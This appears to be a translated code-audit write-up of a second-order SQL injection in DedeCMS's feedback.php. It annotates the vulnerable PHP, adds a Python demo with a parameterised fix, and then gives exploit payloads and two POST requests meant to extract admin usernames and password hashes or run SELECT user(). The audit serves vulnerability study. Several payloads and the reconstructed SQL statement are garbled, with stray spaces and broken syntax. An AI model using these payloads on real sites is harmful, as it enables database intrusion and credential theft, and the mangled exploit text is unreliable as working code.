Vulnerable file: /plus/feedback.php
```php
if ($comtype == 'comments')  // the problem starts here
{
    $arctitle = addslashes($title);  // $title is the key. addslashes() escapes it: pass in 1' and $arctitle becomes 1\'
    $typeid   = intval($typeid);     // not relevant here
    $ischeck  = intval($ischeck);    // not relevant here
    $feedbacktype = preg_replace("#[^0-9a-z]#i", "", $feedbacktype);
    if ($msg != '')  // if $msg is not empty, keep going
    {
        $inquery = "INSERT INTO `dede_feedback` (`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
                    VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg');";
        // $arctitle is carried into the $inquery SQL statement; check what that does further on.
        $rs = $dsql->ExecuteNoneQuery($inquery);  // ExecuteNoneQuery sends the SQL statement
        // Think about it: $arctitle was escaped only for this INSERT. Once the row is stored, the value in the
        // database is the unescaped one (MySQL consumes the backslash added by addslashes), so keep reading
        // to see where that stored value is used again.
        if (!$rs)
        {
            ShowMsg('Comment error!', '-1');
            exit();
        }
    }
}
// quoted reply
elseif ($comtype == 'reply')  // the second key
{
    $row = $dsql->GetOne("SELECT * FROM `dede_feedback` WHERE id='$fid'");
    // Look at this query: isn't `dede_feedback` the very table we just inserted into? $fid comes from GET.
    $arctitle = $row['arctitle'];  // this is where it gets interesting: the arctitle value read back from the
                                   // database is assigned to $arctitle. Now watch where $arctitle goes.
    $aid = $row['aid'];            // not relevant here
    $msg = $quotemsg . $msg;       // not relevant here
    $msg = HtmlReplace($msg, 2);   // not relevant here
    $inquery = "INSERT INTO `dede_feedback` (`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
                VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
    // $arctitle goes straight into $inquery with no escaping. Add an echo $inquery; here to see the statement that is built.
    $dsql->ExecuteNoneQuery($inquery);  // sends the SQL. Let's look at this function.
}
```
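The two-step flow above, as an added example that is not DedeCMS code: an in-memory SQLite table stands in for `dede_feedback`, the first INSERT escapes the title (so the raw text is what gets stored), and the reply path re-reads that stored title and splices it into a second INSERT by string concatenation, shown beside the parameterised form that closes the hole. Table and column names are simplified assumptions.

```python
import sqlite3

# Added example, not DedeCMS code: a tiny table stands in for `dede_feedback`.

def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE feedback (id INTEGER PRIMARY KEY, aid INTEGER,"
                 " arctitle TEXT, msg TEXT)")
    return conn

def post_comment(conn, aid, title, msg):
    # 'comments' branch: the title is escaped on the way in (a bound parameter
    # plays the role of addslashes), so the RAW title, quotes included, is what
    # the row stores. Returns the new row id, i.e. the later $fid.
    cur = conn.execute("INSERT INTO feedback (aid, arctitle, msg) VALUES (?, ?, ?)",
                       (aid, title, msg))
    return cur.lastrowid

def _latest(conn):
    return conn.execute("SELECT arctitle, msg FROM feedback "
                        "ORDER BY id DESC LIMIT 1").fetchone()

def reply_concat(conn, fid, msg):
    # 'reply' branch as on the page: the stored title is read back and spliced
    # into a second INSERT by string concatenation, with no escaping at all.
    aid, arctitle = conn.execute(
        "SELECT aid, arctitle FROM feedback WHERE id = ?", (fid,)).fetchone()
    inquery = (f"INSERT INTO feedback (aid, arctitle, msg) "
               f"VALUES ('{aid}', '{arctitle}', '{msg}')")
    conn.execute(inquery)  # any quote inside arctitle is now parsed as SQL
    return _latest(conn)

def concat_reply_fails(conn, fid, msg):
    # True when the concatenated reply errors out: a harmless title such as
    # O'Neil trips the same parser confusion that an injected title abuses.
    try:
        reply_concat(conn, fid, msg)
        return False
    except sqlite3.OperationalError:
        return True

def reply_param(conn, fid, msg):
    # Hardened reply: values read back from the database are bound as
    # parameters exactly like request input, so they are never parsed as SQL.
    aid, arctitle = conn.execute(
        "SELECT aid, arctitle FROM feedback WHERE id = ?", (fid,)).fetchone()
    conn.execute("INSERT INTO feedback (aid, arctitle, msg) VALUES (?, ?, ?)",
                 (aid, arctitle, msg))
    return _latest(conn)
```

The lesson is that escaping is a property of one query, not of the data: anything read back from the database must be treated as untrusted input again, which parameterised queries do for free.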
The function that sends the statement:

```php
/*
 * Executes an SQL statement that returns no result set, such as UPDATE, DELETE and INSERT.
 */
function ExecuteNoneQuery($sql = "") { ... }
```

Nothing comes back except an error on failure, so the result of the injected query cannot be read directly; the exp has to be built some other way.

Idea 1:

During the first insert we construct $arctitle as:

```text
1, @ ''', 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit), (, 1, '1
```

POST to http://localhost/dede/uploads/plus/feedback.php:

```text
action=send&comtype=comments&aid=16&isconfirm=yes&feedbacktype=feedback&face=1&msg=33333&notuser=1&validate=gram&typeid=12&title=1, @ ''', 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit )), (1, 1, '1
```

When the row is read back for the reply, the second SQL statement becomes:

```text
INSERT INTO `dede_feedback` (`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('16', '0', 'tourists', '1, @ ''', 1, 1, 1, 1, 1, 1, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM '% 23 @__ admin' limit 127), (, 1, '1. 0.0.1 ', '1', '000000', '0', '0', '0', 'feedback', '0 ′,")
```

The audit ends here. The final exp only gets as far as select user(); it can be thought through further.

The first POST, to http://localhost/dede/uploads/plus/feedback.php:

```text
action=send&comtype=comments&aid=13&isconfirm=yes&feedbacktype=feedback&face=1&msg=22222&notuser=1&validate=gram&typeid=12&title=',@`'`,1,1,1,1,1,1,1,(SELECT user())),(1,
```

The second POST, to the same URL (aid must be the same as in the request above; fid selects the stored row):

```text
action=send&comtype=reply&aid=13&isconfirm=yes&feedbacktype=feedback&validate=upse&fid=9
```